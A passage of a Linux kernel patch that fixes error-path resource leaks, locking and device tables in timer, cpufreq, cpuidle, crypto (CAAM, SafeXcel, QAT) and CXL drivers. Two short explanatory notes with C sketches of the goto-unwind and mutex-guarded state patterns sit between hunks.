+@@ -257,21 +257,25 @@ int __init davinci_timer_register(struct clk *clk,
+ 				resource_size(&timer_cfg->reg),
+ 				"davinci-timer")) {
+ 		pr_err("Unable to request memory region\n");
+-		return -EBUSY;
++		rv = -EBUSY;
++		goto exit_clk_disable;
+ 	}
+ 
+ 	base = ioremap(timer_cfg->reg.start, resource_size(&timer_cfg->reg));
+ 	if (!base) {
+ 		pr_err("Unable to map the register range\n");
+-		return -ENOMEM;
++		rv = -ENOMEM;
++		goto exit_mem_region;
+ 	}
+ 
+ 	davinci_timer_init(base);
+ 	tick_rate = clk_get_rate(clk);
+ 
+ 	clockevent = kzalloc(sizeof(*clockevent), GFP_KERNEL);
+-	if (!clockevent)
+-		return -ENOMEM;
++	if (!clockevent) {
++		rv = -ENOMEM;
++		goto exit_iounmap_base;
++	}
+ 
+ 	clockevent->dev.name = "tim12";
+ 	clockevent->dev.features = CLOCK_EVT_FEAT_ONESHOT;
+@@ -296,7 +300,7 @@ int __init davinci_timer_register(struct clk *clk,
+ 			 "clockevent/tim12", clockevent);
+ 	if (rv) {
+ 		pr_err("Unable to request the clockevent interrupt\n");
+-		return rv;
++		goto exit_free_clockevent;
+ 	}
+ 
+ 	davinci_clocksource.dev.rating = 300;
+@@ -323,13 +327,27 @@ int __init davinci_timer_register(struct clk *clk,
+ 	rv = clocksource_register_hz(&davinci_clocksource.dev, tick_rate);
+ 	if (rv) {
+ 		pr_err("Unable to register clocksource\n");
+-		return rv;
++		goto exit_free_irq;
+ 	}
+ 
+ 	sched_clock_register(davinci_timer_read_sched_clock,
+ 			     DAVINCI_TIMER_CLKSRC_BITS, tick_rate);
+ 
+ 	return 0;
++
++exit_free_irq:
++	free_irq(timer_cfg->irq[DAVINCI_TIMER_CLOCKEVENT_IRQ].start,
++			clockevent);
++exit_free_clockevent:
++	kfree(clockevent);
++exit_iounmap_base:
++	iounmap(base);
++exit_mem_region:
++	release_mem_region(timer_cfg->reg.start,
++			   resource_size(&timer_cfg->reg));
++exit_clk_disable:
++	clk_disable_unprepare(clk);
++	return rv;
+ }
+ 
+ static int __init of_davinci_timer_register(struct device_node *np)
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 7e56a42750ea5..285ba51b31f60 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1727,7 +1727,7 @@ static unsigned int cpufreq_verify_current_freq(struct cpufreq_policy *policy, b
+ 		 * MHz. In such cases it is better to avoid getting into
+ 		 * unnecessary frequency updates.
+ 		 */
+-		if (abs(policy->cur - new_freq) < HZ_PER_MHZ)
++		if (abs(policy->cur - new_freq) < KHZ_PER_MHZ)
+ 			return policy->cur;
+ 
+ 		cpufreq_out_of_sync(policy, new_freq);
+diff --git a/drivers/cpufreq/mediatek-cpufreq.c b/drivers/cpufreq/mediatek-cpufreq.c
+index 7f2680bc9a0f4..9a39a7ccfae96 100644
+--- a/drivers/cpufreq/mediatek-cpufreq.c
++++ b/drivers/cpufreq/mediatek-cpufreq.c
+@@ -373,13 +373,13 @@ static struct device *of_get_cci(struct device *cpu_dev)
+ 	struct platform_device *pdev;
+ 
+ 	np = of_parse_phandle(cpu_dev->of_node, "mediatek,cci", 0);
+-	if (IS_ERR_OR_NULL(np))
+-		return NULL;
++	if (!np)
++		return ERR_PTR(-ENODEV);
+ 
+ 	pdev = of_find_device_by_node(np);
+ 	of_node_put(np);
+-	if (IS_ERR_OR_NULL(pdev))
+-		return NULL;
++	if (!pdev)
++		return ERR_PTR(-ENODEV);
+ 
+ 	return &pdev->dev;
+ }
+@@ -401,7 +401,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	info->ccifreq_bound = false;
+ 	if (info->soc_data->ccifreq_supported) {
+ 		info->cci_dev = of_get_cci(info->cpu_dev);
+-		if (IS_ERR_OR_NULL(info->cci_dev)) {
++		if (IS_ERR(info->cci_dev)) {
+ 			ret = PTR_ERR(info->cci_dev);
+ 			dev_err(cpu_dev, "cpu%d: failed to get cci device\n", cpu);
+ 			return -ENODEV;
+@@ -420,7 +420,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->inter_clk);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get intermediate clk\n", cpu);
+-		goto out_free_resources;
++		goto out_free_mux_clock;
+ 	}
+ 
+ 	info->proc_reg = regulator_get_optional(cpu_dev, "proc");
+@@ -428,13 +428,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->proc_reg);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get proc regulator\n", cpu);
+-		goto out_free_resources;
++		goto out_free_inter_clock;
+ 	}
+ 
+ 	ret = regulator_enable(info->proc_reg);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: failed to enable vproc\n", cpu);
+-		goto out_free_resources;
++		goto out_free_proc_reg;
+ 	}
+ 
+ 	/* Both presence and absence of sram regulator are valid cases. */
+@@ -442,14 +442,14 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (IS_ERR(info->sram_reg)) {
+ 		ret = PTR_ERR(info->sram_reg);
+ 		if (ret == -EPROBE_DEFER)
+-			goto out_free_resources;
++			goto out_disable_proc_reg;
+ 
+ 		info->sram_reg = NULL;
+ 	} else {
+ 		ret = regulator_enable(info->sram_reg);
+ 		if (ret) {
+ 			dev_warn(cpu_dev, "cpu%d: failed to enable vsram\n", cpu);
+-			goto out_free_resources;
++			goto out_free_sram_reg;
+ 		}
+ 	}
+ 
+@@ -458,13 +458,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (ret) {
+ 		dev_err(cpu_dev,
+ 			"cpu%d: failed to get OPP-sharing information\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = dev_pm_opp_of_cpumask_add_table(&info->cpus);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: no OPP table\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = clk_prepare_enable(info->cpu_clk);
+@@ -533,43 +533,41 @@ out_disable_mux_clock:
+ out_free_opp_table:
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 
+-out_free_resources:
+-	if (regulator_is_enabled(info->proc_reg))
+-		regulator_disable(info->proc_reg);
+-	if (info->sram_reg && regulator_is_enabled(info->sram_reg))
++out_disable_sram_reg:
++	if (info->sram_reg)
+ 		regulator_disable(info->sram_reg);
+ 
+-	if (!IS_ERR(info->proc_reg))
+-		regulator_put(info->proc_reg);
+-	if (!IS_ERR(info->sram_reg))
++out_free_sram_reg:
++	if (info->sram_reg)
+ 		regulator_put(info->sram_reg);
+-	if (!IS_ERR(info->cpu_clk))
+-		clk_put(info->cpu_clk);
+-	if (!IS_ERR(info->inter_clk))
+-		clk_put(info->inter_clk);
++
++out_disable_proc_reg:
++	regulator_disable(info->proc_reg);
++
++out_free_proc_reg:
++	regulator_put(info->proc_reg);
++
++out_free_inter_clock:
++	clk_put(info->inter_clk);
++
++out_free_mux_clock:
++	clk_put(info->cpu_clk);
+ 
+ 	return ret;
+ }
+ 
+ static void mtk_cpu_dvfs_info_release(struct mtk_cpu_dvfs_info *info)
+ {
+-	if (!IS_ERR(info->proc_reg)) {
+-		regulator_disable(info->proc_reg);
+-		regulator_put(info->proc_reg);
+-	}
+-	if (!IS_ERR(info->sram_reg)) {
++	regulator_disable(info->proc_reg);
++	regulator_put(info->proc_reg);
++	if (info->sram_reg) {
+ 		regulator_disable(info->sram_reg);
+ 		regulator_put(info->sram_reg);
+ 	}
+-	if (!IS_ERR(info->cpu_clk)) {
+-		clk_disable_unprepare(info->cpu_clk);
+-		clk_put(info->cpu_clk);
+-	}
+-	if (!IS_ERR(info->inter_clk)) {
+-		clk_disable_unprepare(info->inter_clk);
+-		clk_put(info->inter_clk);
+-	}
+-
++	clk_disable_unprepare(info->cpu_clk);
++	clk_put(info->cpu_clk);
++	clk_disable_unprepare(info->inter_clk);
++	clk_put(info->inter_clk);
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 	dev_pm_opp_unregister_notifier(info->cpu_dev, &info->opp_nb);
+ }
+@@ -695,6 +693,15 @@ static const struct mtk_cpufreq_platform_data mt2701_platform_data = {
+ 	.ccifreq_supported = false,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt7622_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1360000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1360000,
++	.ccifreq_supported = false,
++};
++
+ static const struct mtk_cpufreq_platform_data mt8183_platform_data = {
+ 	.min_volt_shift = 100000,
+ 	.max_volt_shift = 200000,
+@@ -713,20 +720,29 @@ static const struct mtk_cpufreq_platform_data mt8186_platform_data = {
+ 	.ccifreq_supported = true,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt8516_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1310000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1310000,
++	.ccifreq_supported = false,
++};
++
+ /* List of machines supported by this driver */
+ static const struct of_device_id mtk_cpufreq_machines[] __initconst = {
+ 	{ .compatible = "mediatek,mt2701", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt2712", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7622", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7623", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8167", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt7622", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt7623", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt8167", .data = &mt8516_platform_data },
+ 	{ .compatible = "mediatek,mt817x", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8173", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8176", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8183", .data = &mt8183_platform_data },
+ 	{ .compatible = "mediatek,mt8186", .data = &mt8186_platform_data },
+ 	{ .compatible = "mediatek,mt8365", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8516", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt8516", .data = &mt8516_platform_data },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, mtk_cpufreq_machines);
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index d3f55ca06ed34..64a50777d88b8 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -14,7 +14,6 @@
+ #include <linux/of_address.h>
+ #include <linux/of_platform.h>
+ #include <linux/pm_opp.h>
+-#include <linux/pm_qos.h>
+ #include <linux/slab.h>
+ #include <linux/spinlock.h>
+ #include <linux/units.h>
+@@ -43,7 +42,6 @@ struct qcom_cpufreq_soc_data {
+ 
+ struct qcom_cpufreq_data {
+ 	void __iomem *base;
+-	struct resource *res;
+ 
+ 	/*
+ 	 * Mutex to synchronize between de-init sequence and re-starting LMh
+@@ -58,8 +56,6 @@ struct qcom_cpufreq_data {
+ 	struct clk_hw cpu_clk;
+ 
+ 	bool per_core_dcvs;
+-
+-	struct freq_qos_request throttle_freq_req;
+ };
+ 
+ static struct {
+@@ -349,8 +345,6 @@ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ 
+ 	throttled_freq = freq_hz / HZ_PER_KHZ;
+ 
+-	freq_qos_update_request(&data->throttle_freq_req, throttled_freq);
+-
+ 	/* Update thermal pressure (the boost frequencies are accepted) */
+ 	arch_update_thermal_pressure(policy->related_cpus, throttled_freq);
+ 
+@@ -443,14 +437,6 @@ static int qcom_cpufreq_hw_lmh_init(struct cpufreq_policy *policy, int index)
+ 	if (data->throttle_irq < 0)
+ 		return data->throttle_irq;
+ 
+-	ret = freq_qos_add_request(&policy->constraints,
+-				   &data->throttle_freq_req, FREQ_QOS_MAX,
+-				   FREQ_QOS_MAX_DEFAULT_VALUE);
+-	if (ret < 0) {
+-		dev_err(&pdev->dev, "Failed to add freq constraint (%d)\n", ret);
+-		return ret;
+-	}
+-
+ 	data->cancel_throttle = false;
+ 	data->policy = policy;
+ 
+@@ -517,7 +503,6 @@ static void qcom_cpufreq_hw_lmh_exit(struct qcom_cpufreq_data *data)
+ 	if (data->throttle_irq <= 0)
+ 		return;
+ 
+-	freq_qos_remove_request(&data->throttle_freq_req);
+ 	free_irq(data->throttle_irq, data);
+ }
+ 
+@@ -590,16 +575,12 @@ static int qcom_cpufreq_hw_cpu_exit(struct cpufreq_policy *policy)
+ {
+ 	struct device *cpu_dev = get_cpu_device(policy->cpu);
+ 	struct qcom_cpufreq_data *data = policy->driver_data;
+-	struct resource *res = data->res;
+-	void __iomem *base = data->base;
+ 
+ 	dev_pm_opp_remove_all_dynamic(cpu_dev);
+ 	dev_pm_opp_of_cpumask_remove_table(policy->related_cpus);
+ 	qcom_cpufreq_hw_lmh_exit(data);
+ 	kfree(policy->freq_table);
+ 	kfree(data);
+-	iounmap(base);
+-	release_mem_region(res->start, resource_size(res));
+ 
+ 	return 0;
+ }
+@@ -718,17 +699,15 @@ static int qcom_cpufreq_hw_driver_probe(struct platform_device *pdev)
+ 	for (i = 0; i < num_domains; i++) {
+ 		struct qcom_cpufreq_data *data = &qcom_cpufreq.data[i];
+ 		struct clk_init_data clk_init = {};
+-		struct resource *res;
+ 		void __iomem *base;
+ 
+-		base = devm_platform_get_and_ioremap_resource(pdev, i, &res);
++		base = devm_platform_ioremap_resource(pdev, i);
+ 		if (IS_ERR(base)) {
+-			dev_err(dev, "Failed to map resource %pR\n", res);
++			dev_err(dev, "Failed to map resource index %d\n", i);
+ 			return PTR_ERR(base);
+ 		}
+ 
+ 		data->base = base;
+-		data->res = res;
+ 
+ 		/* Register CPU clock for each frequency domain */
+ 		clk_init.name = kasprintf(GFP_KERNEL, "qcom_cpufreq%d", i);
+diff --git a/drivers/cpuidle/cpuidle-riscv-sbi.c b/drivers/cpuidle/cpuidle-riscv-sbi.c
+index 05fe2902df9a7..af7320a768d27 100644
+--- a/drivers/cpuidle/cpuidle-riscv-sbi.c
++++ b/drivers/cpuidle/cpuidle-riscv-sbi.c
+@@ -612,7 +612,7 @@ static int __init sbi_cpuidle_init(void)
+ 	 * 2) SBI HSM extension is available
+ 	 */
+ 	if ((sbi_spec_version < sbi_mk_version(0, 3)) ||
+-	    sbi_probe_extension(SBI_EXT_HSM) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_HSM)) {
+ 		pr_info("HSM suspend not available\n");
+ 		return 0;
+ 	}
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index dfb103f81a64b..8d06bc30eadeb 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -820,6 +820,7 @@ config CRYPTO_DEV_SA2UL
+ 	select CRYPTO_AES
+ 	select CRYPTO_ALGAPI
+ 	select CRYPTO_AUTHENC
++	select CRYPTO_DES
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_SHA256
+ 	select CRYPTO_SHA512
+diff --git a/drivers/crypto/caam/ctrl.c b/drivers/crypto/caam/ctrl.c
+index 32253a064d0fe..3b79e0d83d40a 100644
+--- a/drivers/crypto/caam/ctrl.c
++++ b/drivers/crypto/caam/ctrl.c
+@@ -284,6 +284,10 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		const u32 rdsta_if = RDSTA_IF0 << sh_idx;
+ 		const u32 rdsta_pr = RDSTA_PR0 << sh_idx;
+ 		const u32 rdsta_mask = rdsta_if | rdsta_pr;
++
++		/* Clear the contents before using the descriptor */
++		memset(desc, 0x00, CAAM_CMD_SZ * 7);
++
+ 		/*
+ 		 * If the corresponding bit is set, this state handle
+ 		 * was initialized by somebody else, so it's left alone.
+@@ -327,8 +331,6 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		}
+ 
+ 		dev_info(ctrldev, "Instantiated RNG4 SH%d\n", sh_idx);
+-		/* Clear the contents before recreating the descriptor */
+-		memset(desc, 0x00, CAAM_CMD_SZ * 7);
+ 	}
+ 
+ 	kfree(desc);
+diff --git a/drivers/crypto/ccp/sp-pci.c b/drivers/crypto/ccp/sp-pci.c
+index 084d052fddccb..55411b494d69a 100644
+--- a/drivers/crypto/ccp/sp-pci.c
++++ b/drivers/crypto/ccp/sp-pci.c
+@@ -451,9 +451,9 @@ static const struct pci_device_id sp_pci_table[] = {
+ 	{ PCI_VDEVICE(AMD, 0x1468), (kernel_ulong_t)&dev_vdata[2] },
+ 	{ PCI_VDEVICE(AMD, 0x1486), (kernel_ulong_t)&dev_vdata[3] },
+ 	{ PCI_VDEVICE(AMD, 0x15DF), (kernel_ulong_t)&dev_vdata[4] },
+-	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[4] },
+ 	{ PCI_VDEVICE(AMD, 0x14CA), (kernel_ulong_t)&dev_vdata[5] },
+ 	{ PCI_VDEVICE(AMD, 0x15C7), (kernel_ulong_t)&dev_vdata[6] },
++	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[6] },
+ 	/* Last entry must be zero */
+ 	{ 0, }
+ };
+diff --git a/drivers/crypto/inside-secure/safexcel.c b/drivers/crypto/inside-secure/safexcel.c
+index ae6110376e21c..eec44ea32a180 100644
+--- a/drivers/crypto/inside-secure/safexcel.c
++++ b/drivers/crypto/inside-secure/safexcel.c
+@@ -1639,19 +1639,23 @@ static int safexcel_probe_generic(void *pdev,
+ 						     &priv->ring[i].rdr);
+ 		if (ret) {
+ 			dev_err(dev, "Failed to initialize rings\n");
+-			return ret;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].rdr_req = devm_kcalloc(dev,
+ 			EIP197_DEFAULT_RING_SIZE,
+ 			sizeof(*priv->ring[i].rdr_req),
+ 			GFP_KERNEL);
+-		if (!priv->ring[i].rdr_req)
+-			return -ENOMEM;
++		if (!priv->ring[i].rdr_req) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq = devm_kzalloc(dev, sizeof(*ring_irq), GFP_KERNEL);
+-		if (!ring_irq)
+-			return -ENOMEM;
++		if (!ring_irq) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq->priv = priv;
+ 		ring_irq->ring = i;
+@@ -1665,7 +1669,8 @@ static int safexcel_probe_generic(void *pdev,
+ 						ring_irq);
+ 		if (irq < 0) {
+ 			dev_err(dev, "Failed to get IRQ ID for ring %d\n", i);
+-			return irq;
++			ret = irq;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].irq = irq;
+@@ -1677,8 +1682,10 @@ static int safexcel_probe_generic(void *pdev,
+ 		snprintf(wq_name, 9, "wq_ring%d", i);
+ 		priv->ring[i].workqueue =
+ 			create_singlethread_workqueue(wq_name);
+-		if (!priv->ring[i].workqueue)
+-			return -ENOMEM;
++		if (!priv->ring[i].workqueue) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		priv->ring[i].requests = 0;
+ 		priv->ring[i].busy = false;
+@@ -1695,16 +1702,26 @@ static int safexcel_probe_generic(void *pdev,
+ 	ret = safexcel_hw_init(priv);
+ 	if (ret) {
+ 		dev_err(dev, "HW init failed (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	ret = safexcel_register_algorithms(priv);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register algorithms (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	return 0;
++
++err_cleanup_rings:
++	for (i = 0; i < priv->config.rings; i++) {
++		if (priv->ring[i].irq)
++			irq_set_affinity_hint(priv->ring[i].irq, NULL);
++		if (priv->ring[i].workqueue)
++			destroy_workqueue(priv->ring[i].workqueue);
++	}
++
++	return ret;
+ }
+ 
+ static void safexcel_hw_reset_rings(struct safexcel_crypto_priv *priv)
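The hunk above converts every early return in the ring-setup loop into a jump to one unwind label, so rings that were already brought up are torn down again on failure. A minimal stand-alone sketch of the goto-unwind idiom follows; the names and the plain malloc/free are illustrative only, not the driver's devm-managed resources:

#include <stdlib.h>

struct ring { void *buf; };

static int setup_rings(struct ring *rings, int count)
{
	int i, ret = 0;

	for (i = 0; i < count; i++) {
		rings[i].buf = malloc(64);
		if (!rings[i].buf) {
			ret = -1;
			goto err_cleanup_rings;	/* unwind what we built */
		}
	}
	return 0;

err_cleanup_rings:
	/* Free only the rings that were successfully set up. */
	while (i--)
		free(rings[i].buf);
	return ret;
}

int main(void)
{
	struct ring rings[4];

	return setup_rings(rings, 4) ? EXIT_FAILURE : EXIT_SUCCESS;
}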
+diff --git a/drivers/crypto/qat/qat_common/adf_accel_devices.h b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+index 284f5aad3ee0b..7be933d6f0ffa 100644
+--- a/drivers/crypto/qat/qat_common/adf_accel_devices.h
++++ b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+@@ -310,6 +310,7 @@ struct adf_accel_dev {
+ 			u8 pf_compat_ver;
+ 		} vf;
+ 	};
++	struct mutex state_lock; /* protect state of the device */
+ 	bool is_vf;
+ 	u32 accel_id;
+ };
+diff --git a/drivers/crypto/qat/qat_common/adf_common_drv.h b/drivers/crypto/qat/qat_common/adf_common_drv.h
+index 7189265573c08..4bf1fceb7052b 100644
+--- a/drivers/crypto/qat/qat_common/adf_common_drv.h
++++ b/drivers/crypto/qat/qat_common/adf_common_drv.h
+@@ -58,6 +58,9 @@ void adf_dev_stop(struct adf_accel_dev *accel_dev);
+ void adf_dev_shutdown(struct adf_accel_dev *accel_dev);
+ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev);
+ 
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool init_config);
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool cache_config);
++
+ void adf_devmgr_update_class_index(struct adf_hw_device_data *hw_data);
+ void adf_clean_vf_map(bool);
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_dev_mgr.c b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+index 4c752eed10fea..86ee36feefad3 100644
+--- a/drivers/crypto/qat/qat_common/adf_dev_mgr.c
++++ b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+@@ -223,6 +223,7 @@ int adf_devmgr_add_dev(struct adf_accel_dev *accel_dev,
+ 		map->attached = true;
+ 		list_add_tail(&map->list, &vfs_table);
+ 	}
++	mutex_init(&accel_dev->state_lock);
+ unlock:
+ 	mutex_unlock(&table_lock);
+ 	return ret;
+@@ -269,6 +270,7 @@ void adf_devmgr_rm_dev(struct adf_accel_dev *accel_dev,
+ 		}
+ 	}
+ unlock:
++	mutex_destroy(&accel_dev->state_lock);
+ 	list_del(&accel_dev->list);
+ 	mutex_unlock(&table_lock);
+ }
+diff --git a/drivers/crypto/qat/qat_common/adf_init.c b/drivers/crypto/qat/qat_common/adf_init.c
+index cef7bb8ec0073..988cffd0b8338 100644
+--- a/drivers/crypto/qat/qat_common/adf_init.c
++++ b/drivers/crypto/qat/qat_common/adf_init.c
+@@ -400,3 +400,67 @@ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev)
+ 
+ 	return 0;
+ }
++
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool reconfig)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (!adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already down\n",
++			 accel_dev->accel_id);
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (reconfig) {
++		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		goto out;
++	}
++
++	adf_dev_stop(accel_dev);
++	adf_dev_shutdown(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_down);
++
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool config)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already up\n",
++			 accel_dev->accel_id);
++		ret = -EALREADY;
++		goto out;
++	}
++
++	if (config && GET_HW_DATA(accel_dev)->dev_config) {
++		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
++		if (unlikely(ret))
++			goto out;
++	}
++
++	ret = adf_dev_init(accel_dev);
++	if (unlikely(ret))
++		goto out;
++
++	ret = adf_dev_start(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_up);
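The new adf_dev_up()/adf_dev_down() helpers serialize state transitions behind the per-device state_lock, so concurrent up/down requests cannot interleave. A userspace model of that pattern, using pthreads as a stand-in for the kernel mutex and omitting the real config/init/start steps:

#include <errno.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

struct accel_dev {
	pthread_mutex_t state_lock;
	bool started;
};

static int dev_up(struct accel_dev *d)
{
	int ret = 0;

	pthread_mutex_lock(&d->state_lock);
	if (d->started) {
		ret = -EALREADY;	/* mirrors adf_dev_up() */
		goto out;
	}
	d->started = true;		/* init + start would go here */
out:
	pthread_mutex_unlock(&d->state_lock);
	return ret;
}

static int dev_down(struct accel_dev *d)
{
	int ret = 0;

	pthread_mutex_lock(&d->state_lock);
	if (!d->started) {
		ret = -EINVAL;		/* mirrors adf_dev_down() */
		goto out;
	}
	d->started = false;		/* stop + shutdown would go here */
out:
	pthread_mutex_unlock(&d->state_lock);
	return ret;
}

int main(void)
{
	struct accel_dev d = { PTHREAD_MUTEX_INITIALIZER, false };

	printf("up: %d, up again: %d, down: %d\n",
	       dev_up(&d), dev_up(&d), dev_down(&d));
	return 0;
}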
+diff --git a/drivers/crypto/qat/qat_common/adf_sysfs.c b/drivers/crypto/qat/qat_common/adf_sysfs.c
+index e8b078e719c20..3eb6611ab1b11 100644
+--- a/drivers/crypto/qat/qat_common/adf_sysfs.c
++++ b/drivers/crypto/qat/qat_common/adf_sysfs.c
+@@ -50,38 +50,21 @@ static ssize_t state_store(struct device *dev, struct device_attribute *attr,
+ 
+ 	switch (ret) {
+ 	case DEV_DOWN:
+-		if (!adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already down\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Stopping device qat_dev%d\n", accel_id);
+ 
+-		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		ret = adf_dev_down(accel_dev, true);
+ 		if (ret < 0)
+ 			return -EINVAL;
+ 
+ 		break;
+ 	case DEV_UP:
+-		if (adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already up\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Starting device qat_dev%d\n", accel_id);
+ 
+-		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_init(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_start(accel_dev);
+-
++		ret = adf_dev_up(accel_dev, true);
+ 		if (ret < 0) {
+ 			dev_err(dev, "Failed to start device qat_dev%d\n",
+ 				accel_id);
+-			adf_dev_shutdown_cache_cfg(accel_dev);
++			adf_dev_down(accel_dev, true);
+ 			return ret;
+ 		}
+ 		break;
+diff --git a/drivers/cxl/core/hdm.c b/drivers/cxl/core/hdm.c
+index dcc16d7cb8f37..c6a244d54ff68 100644
+--- a/drivers/cxl/core/hdm.c
++++ b/drivers/cxl/core/hdm.c
+@@ -219,8 +219,11 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 
+ 	lockdep_assert_held_write(&cxl_dpa_rwsem);
+ 
+-	if (!len)
+-		goto success;
++	if (!len) {
++		dev_warn(dev, "decoder%d.%d: empty reservation attempted\n",
++			 port->id, cxled->cxld.id);
++		return -EINVAL;
++	}
+ 
+ 	if (cxled->dpa_res) {
+ 		dev_dbg(dev, "decoder%d.%d: existing allocation %pr assigned\n",
+@@ -273,7 +276,6 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 		cxled->mode = CXL_DECODER_MIXED;
+ 	}
+ 
+-success:
+ 	port->hdm_end++;
+ 	get_device(&cxled->cxld.dev);
+ 	return 0;
+@@ -732,6 +734,13 @@ static int init_hdm_decoder(struct cxl_port *port, struct cxl_decoder *cxld,
+ 				 port->id, cxld->id);
+ 			return -ENXIO;
+ 		}
++
++		if (size == 0) {
++			dev_warn(&port->dev,
++				 "decoder%d.%d: Committed with zero size\n",
++				 port->id, cxld->id);
++			return -ENXIO;
++		}
+ 		port->commit_end = cxld->id;
+ 	} else {
+ 		/* unless / until type-2 drivers arrive, assume type-3 */
+diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c
+index d6c9781cd46af..bfc8ae2143957 100644
